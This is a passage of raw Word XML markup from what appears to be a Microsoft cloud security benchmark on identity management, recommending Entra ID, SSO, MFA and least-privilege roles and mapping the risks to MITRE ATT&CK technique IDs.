    <w:p w14:paraId="03B02C25" w14:textId="181D6E0F" w:rsidR="00314A45" w:rsidRDefault="00314A45" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C635688" w14:textId="73B7CE60" w:rsidR="002F7321" w:rsidRPr="00E53977" w:rsidRDefault="002F7321" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002F7321">
        <w:t>T1078 - Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71293310" w14:textId="596010B0" w:rsidR="00314A45" w:rsidRDefault="00314A45" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18493AD7" w14:textId="05FA011B" w:rsidR="002F7321" w:rsidRPr="00E53977" w:rsidRDefault="002F7321" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="361"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="002F7321">
        <w:t>T1562 - Impair Defenses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B230367" w14:textId="5B904237" w:rsidR="00314A45" w:rsidRDefault="00314A45" w:rsidP="002C7D03">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>IM-1.1: Centralize identity and authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8BAC39" w14:textId="5EC63C25" w:rsidR="0005196D" w:rsidRPr="0005196D" w:rsidRDefault="0005196D" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t>Implement centralized identity management using the following approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FAF766C" w14:textId="5513BD65" w:rsidR="00666F55" w:rsidRDefault="00666F55" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Cloud identity platform adoption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B24716A" w14:textId="0DE949B5" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t xml:space="preserve">Microsoft Entra ID is a </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="0005196D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>multitenant</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0005196D">
        <w:t xml:space="preserve">, cloud-based identity and access management service that centralizes authentication, authorization, and governance for Microsoft and non-Microsoft environments that support Entra ID. </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidRPr="0005196D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Standardize</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0005196D">
        <w:t xml:space="preserve"> Microsoft Entra ID to manage identities across all resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5205AC22" w14:textId="5FEEF3ED" w:rsidR="00666F55" w:rsidRPr="00E53977" w:rsidRDefault="00666F55" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Manage cloud resource identities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33C50F27" w14:textId="086EFD1B" w:rsidR="00666F55" w:rsidRPr="00E53977" w:rsidRDefault="00666F55" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t> Use managed identities and workload identity federation for Microsoft cloud resources including Azure Storage, Azure Virtual Machines (Linux and Windows), Azure Key Vault, PaaS, and SaaS applications to eliminate secrets and ensure isolation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3833FF" w14:textId="4DF7E2D1" w:rsidR="00666F55" w:rsidRDefault="00666F55" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Centralize organizational resource authentication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6396FB" w14:textId="734C71ED" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t>Leverage single sign-on (SSO) and Conditional Access for organizational resources such as applications hosted on Azure, third-party applications on corporate networks, and third-party SaaS applications to provide secure, context-aware access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361E6789" w14:textId="7ECEB5AE" w:rsidR="00666F55" w:rsidRDefault="00666F55" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Synchronize hybrid identities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B62B939" w14:textId="28A0F4AB" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t xml:space="preserve">Sync on-premises Active Directory with Microsoft Entra ID via </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:history="1">
        <w:r w:rsidRPr="0005196D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Microsoft Entra Connect Sync</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0005196D">
        <w:t xml:space="preserve"> to maintain a consistent, centrally managed hybrid identity strategy for enterprise identities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A1C24B" w14:textId="03AD3612" w:rsidR="00666F55" w:rsidRDefault="00666F55" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Eliminate local authentication for Azure services</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F59F4B" w14:textId="51D69F61" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t xml:space="preserve">Avoid local authentication methods for Azure services and use Microsoft Entra ID to centralize authentication, employing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0005196D">
        <w:t>passwordless</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0005196D">
        <w:t xml:space="preserve"> methods (e.g., </w:t>
      </w:r>
      <w:hyperlink r:id="rId20" w:history="1">
        <w:r w:rsidRPr="0005196D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Windows Hello</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="0005196D">
        <w:t>, FIDO2 keys) and multifactor authentication (MFA) to enhance security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C23639" w14:textId="3F89FEE4" w:rsidR="00F45482" w:rsidRPr="00E53977" w:rsidRDefault="00F45482" w:rsidP="00F45482">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc242449481"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>IM-2: Protect identity and authentication systems</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w14:paraId="39A06B97" w14:textId="7B6E3427" w:rsidR="00F45482" w:rsidRPr="00E53977" w:rsidRDefault="00F45482" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C5C50C" w14:textId="701B69E5" w:rsidR="00F45482" w:rsidRPr="00E53977" w:rsidRDefault="00F45482" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Secure your identity and authentication system as a high priority in your organization's cloud security practice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C60C749" w14:textId="77777777" w:rsidR="00F45482" w:rsidRPr="00E53977" w:rsidRDefault="00F45482" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Restrict privileged roles and accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CA258C" w14:textId="77777777" w:rsidR="00F45482" w:rsidRPr="00E53977" w:rsidRDefault="00F45482" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Require strong authentications for all privileged access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718D5A1F" w14:textId="710F2028" w:rsidR="00F45482" w:rsidRPr="00E53977" w:rsidRDefault="00F45482" w:rsidP="009D3882">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="22"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Monitor and audit high risk activities</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6188FB95" w14:textId="14C5347A" w:rsidR="0090219B" w:rsidRPr="00E53977" w:rsidRDefault="0090219B" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="41867FAB" w14:textId="067036A1" w:rsidR="0090219B" w:rsidRPr="00E53977" w:rsidRDefault="0090219B" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential-Based Attacks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FBC751" w14:textId="0D27BE86" w:rsidR="0090219B" w:rsidRDefault="0090219B" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="144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5661E947" w14:textId="77777777" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="0005196D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="2880"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18EFA16D" w14:textId="2A99F7BF" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Elevation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381A0D18" w14:textId="3591793D" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve">Over-provisioned RBAC roles, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>persistent privileged</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> access, and excessive global admin assignments enable unauthorized permission gains, exploited </w:t>
      </w:r>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>by attackers through account takeover or privilege attribute certificate (PAC) misuse to escalate access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F00DE90" w14:textId="19042C21" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Resource Boundary Violations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB0D3B2" w14:textId="0B624F8A" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Inconsistent subscription governance and lack of environment segregation permit cross-resource access, exploited by attackers via lateral movement (e.g., exploiting misconfigured service principals) to breach dev, test, or prod boundaries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622A3F74" w14:textId="713B4B4E" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Cross-Tenant Identity Misuse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12C87C9B" w14:textId="6C581B1D" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Weak cross-tenant authentication and unverified federated identities expose multi-tenant environments, exploited by attackers through token replay or unauthorized identity federation to access external tenants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45773146" w14:textId="52F4C389" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Access Persistence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5818FB2F" w14:textId="7155B0BE" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Threat Detection Evasion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DFB744B" w14:textId="609A4E96" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Misconfiguration Policy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="562CF26A" w14:textId="27480595" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:ind w:left="144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rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053EFCA" w14:textId="41771B0A" w:rsidR="002C7D03" w:rsidRDefault="002C7D03" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Initial Access (TA0001)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6456B90B" w14:textId="56A07448" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t>T1078 - Valid Accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDF5D00" w14:textId="034CD51A" w:rsidR="002C7D03" w:rsidRDefault="002C7D03" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A5FC819" w14:textId="7AA35994" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="363"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t>T1110 - Brute Force</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598DBC89" w14:textId="1D5CDA37" w:rsidR="002C7D03" w:rsidRDefault="002C7D03" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Privilege Escalation (TA0004)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A76ECE" w14:textId="3C03994F" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t>T1134 - Access Token Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4873B5" w14:textId="2B9AB32D" w:rsidR="002C7D03" w:rsidRDefault="002C7D03" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Lateral Movement (TA0008)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63983ECF" w14:textId="5E0B52DF" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t>T1578 - Modify Cloud Compute Infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7089B8" w14:textId="3A8C64A0" w:rsidR="002C7D03" w:rsidRDefault="002C7D03" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Persistence (TA0003)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C39676" w14:textId="0C776033" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t>T1098 - Account Manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCB16EE" w14:textId="1D894961" w:rsidR="002C7D03" w:rsidRDefault="002C7D03" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:lastRenderedPageBreak/>
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D69E955" w14:textId="745F749B" w:rsidR="0005196D" w:rsidRPr="00E53977" w:rsidRDefault="0005196D" w:rsidP="00B50F08">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="362"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="0005196D">
        <w:t>T1550 - Use Alternate Authentication Material</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rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Assess and improve your identity security posture through the following practices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D856D2" w14:textId="7D75E2AE" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E53977">
        <w:t>Evaluate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E53977">
        <w:t xml:space="preserve"> Identity Secure Score</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A4B2D9" w14:textId="4F39CBF2" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Use Identity Secure Score to assess your identity security posture and address configuration gaps, evaluating administrative role assignments, MFA enforcement, legacy authentication status, and consent policies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A3C7DE3" w14:textId="3A66972E" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="005D5104">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="59"/>
        </w:numPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Assign limited administrative roles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304BC4C8" w14:textId="4AEB94CF" w:rsidR="002C7D03" w:rsidRPr="00E53977" w:rsidRDefault="002C7D03" w:rsidP="00816253">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53977">
        <w:t>Enforce least privilege by assigning limited administrative roles and designating 2-4 global administrators for redundancy while avoiding over-provisioning.</w:t>
      </w:r>
    </w:p>
